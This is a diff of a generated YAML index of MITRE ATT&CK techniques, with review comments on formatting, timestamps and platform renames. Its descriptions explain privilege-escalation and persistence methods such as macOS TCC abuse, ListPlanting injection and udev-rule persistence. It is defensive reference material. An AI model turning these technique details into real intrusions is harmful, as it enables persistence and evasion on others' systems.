x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
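Review bot: the `description` scalar switches from a double-quoted string to a `|+` literal block, and `+` is the keep chomping indicator, so the blank `+` line before `kill_chain_phases` becomes part of the value; the old text ended with a single `\n`, the new one ends with two. That is harmless for display but registers as a content difference for anything that hashes or compares descriptions, so if the trailing newlines are not intentional upstream, have the dumper strip them (`|` or `|-`). The wording `an overwrites file (if connected to an MDM)` reads oddly but is the upstream text and should not be hand-patched in a generated file.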
@@ -23323,6 +23585,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23330,7 +23594,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23360,7 +23624,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23406,7 +23669,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23451,8 +23714,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23478,7 +23739,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23504,59 +23765,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
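Review bot: besides the key reorder (the `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` deleted here are all re-added lower in the object), the substantive change is the new `(Citation: Hexacorn Listplanting)` in the description; its matching `source_name: Hexacorn Listplanting` reference is added further down in the same object, so the citation resolves. As rendered here, the description has hard line breaks that leave fragments such as `control.\n\nListPlanting (a`, `child of` and `and/or EnumWindows` on lines of their own, in both the old and new text, always adjacent to `SysListView32`, `FindWindow` or `EnumWindows`; that looks like inline markup around those identifiers being dropped when the upstream text is flattened, so check the generated file for the same breaks.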
@@ -23573,6 +23803,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23587,21 +23820,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
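Review bot: `spec_version: '2.1'` is removed from the T1055.015 object (the `- spec_version: '2.1'` line) while `type`, `id`, `created` and `revoked` are added, so the object is no longer a complete STIX 2.1 SDO; `spec_version` is a required common property on every STIX 2.1 object, and the same removal recurs across this file. If the generator now reads a source that omits it (library output rather than a raw bundle), say so in the commit message, because any consumer that validates these objects as STIX 2.1 will start rejecting them.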
@@ -23646,9 +23910,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
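Review bot: the T1484 platform list loses `SaaS` outright: `- - Azure AD` and `- - SaaS` are replaced by the single `+ - Identity Provider`, so any per-platform index built from `x_mitre_platforms` that previously listed T1484 under SaaS will drop it. Confirm this is the intended upstream v16 platform consolidation rather than a lost line, and regenerate the per-platform indexes in the same change so they do not disagree with this file.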
@@ -23705,8 +23968,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23715,7 +23978,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23757,7 +24019,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
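Review bot: the `modified` timestamp for T1547.008 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-20T16:34:43.405Z'`. The old value shares the `14:00:00.188Z` time-of-day with the other reverted timestamps in this diff, which suggests the previous values were synthesized in bulk rather than copied from upstream. Confirm the new value matches the upstream STIX object, and check that nothing downstream uses `modified` as a monotonic change marker, since a timestamp that goes back in time makes these objects look untouched to such a consumer.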
@@ -23782,12 +24044,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23827,8 +24088,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -23836,13 +24099,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
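Review bot: `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` for T1078.004 while `SaaS` and `IaaS` stay. This matches the ATT&CK v16 platform consolidation, but a consumer filtering on the old strings (per-platform indexes included) now silently misses this technique even though it still applies to the same services, so call out the rename in the commit message and regenerate those indexes together with this file.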
@@ -23873,9 +24136,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Azure Persistence Automation Runbook Created or Modified
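Review bot: the three removals here (`x_mitre_attack_spec_version: 3.2.0`, `x_mitre_modified_by_ref`, `spec_version: '2.1'`) pair with the additions of the first two earlier in the same T1078.004 object, so the net effect is a key reorder plus dropping `spec_version`; the reorder is pure diff churn that would disappear if the generator emitted keys in a stable order, and it makes the one real change (the dropped `spec_version`) easy to miss in review.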
@@ -23959,10 +24219,10 @@ privilege-escalation:
terraform destroy -auto-approve
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
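Review bot: the new sentence about `Win32_ScheduledJob` in the long `+` description line inherits the earlier requirement text ("Task Scheduler service be running ... local Administrators group") but omits that on Windows 8 / Server 2012 and later the class is deprecated and its `Create` method fails unless the `EnableAt` DWORD under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration` is set to 1, so a detection keyed on this path should expect that registry write as a precursor. The wording is upstream ATT&CK text and cannot be fixed locally, but it is worth a line in the commit message for anyone writing detections from this index.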
@@ -24025,7 +24285,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -24059,8 +24319,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -24069,6 +24329,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
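Review bot: the new `Malicious Life by Cybereason` reference carries a `#blog-subscribe` fragment on its URL (`url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe`), which anchors to the newsletter widget rather than the article body; strip the fragment so the link lands on the cited content. The `(n.d.)` in the description is also odd for a dated blog post, but that is upstream wording.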
@@ -24081,7 +24345,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -24184,9 +24447,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
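Review bot: in the new T1546.017 object, `x_mitre_detection` lists only three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, `/usr/lib/udev/rules.d/`) while the description names five, including `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; a file-monitoring rule written from the detection field alone would miss the runtime and local-override paths, which are exactly where a non-package rule file is least expected. The third path also lacks the backticks the first two have, and the single-quoted string ends with a stray space before the closing quote (`2024) '`). These are upstream strings, so flag them upstream rather than editing here.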
@@ -24222,7 +24543,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24246,12 +24567,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24335,11 +24655,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24391,9 +24710,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24442,7 +24760,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
